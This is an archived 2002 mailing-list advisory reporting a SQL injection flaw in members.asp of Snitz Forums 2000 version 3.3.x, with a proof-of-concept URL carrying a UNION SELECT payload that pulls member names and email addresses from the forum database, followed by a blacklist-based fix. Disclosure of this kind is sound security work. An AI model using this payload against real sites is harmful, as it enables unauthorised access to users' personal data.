Snitz Forums 2000 remote SQL query manipulation vulnerability

From: acemi (acemi_5at_private)
Date: Fri Apr 19 2002 - 14:06:46 PDT

Next message: Joe Testa: "Re: Tomcat 4.1 real path disclosure"

Previous message: Berend-Jan Wever: "Re: NSFOCUS SA2002-02 : Microsoft Windows MUP overlong request kernel overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) vulnerable ---------- Product : Snitz Forums 2000 Version : 3.3 3.3.01 3.3.02 3.3.03 (last stable version) Object : members.asp Class : Input validation error (remote SQL query manipulation vulnerability) Vendor-URL : http://forum.snitz.com/ Vendor-Status : informed, not patched Remote-Exploit : yes Introduction ------------ Snitz Forums 2000 is open source ASP-based web forum software. It runs on Microsoft Windows operating systems. A vulnerability exists in Snitz Forums 2000 which makes it possible for a malicious user to remotely manipulate the logic of SQL queries. As a result, it may be possible for attackers to view all data in the forum's database. This vulnerability can be exploited with a web browser. More Details ------------ In members.asp page, when listing the members with a criteria, the input (M_NAME) is not checked for malicious code. As a result, an attacker can add extra SELECT statement to the query with UNION and he/she can view any data in the forum's database. Proof-of-concept ---------------- Normally, to view the members' list whose membername start with 'A', members.asp page is used as the following: /members.asp? mode=search&M_NAME=A&initial=1&method= Use this link to view the vulnerability: /members.asp?mode=search&M_NAME=XXXX% 25')%20UNION%20SELECT%20MEMBER_ID,% 20M_STATUS,%20M_NAME%20%2B%20'/'%20% 2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,% 20M_EMAIL,%20M_COUNTRY,% 20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,% 20M_AIM,%20M_TITLE,%20M_POSTS,% 20M_LASTPOSTDATE,%20M_LASTHEREDATE,% 20M_DATE,%20M_STATE%20FROM% 20FORUM_MEMBERS%20WHERE%20(M_NAME% 20LIKE%20'&initial=1&method= MEMBERNAME column will be MEMBERNAME/EMAIL/ column. Temporary fix ------------- To fix this bug, in members.asp , change the following lines : SearchName = Request("M_NAME") if SearchName = "" then SearchName = Request.Form("M_NAME") end if with : if IsValidString(Request("M_NAME")) then SearchName = Request("M_NAME") end if if SearchName = "" then if IsValidString(Request.Form("M_NAME")) then SearchName = Request.Form("M_NAME") end if end if and in function IsValidString(sValidate) in inc_functions.asp , change the following line: sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<" with : sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"

Next message: Joe Testa: "Re: Tomcat 4.1 real path disclosure"
Previous message: Berend-Jan Wever: "Re: NSFOCUS SA2002-02 : Microsoft Windows MUP overlong request kernel overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 19 2002 - 16:21:12 PDT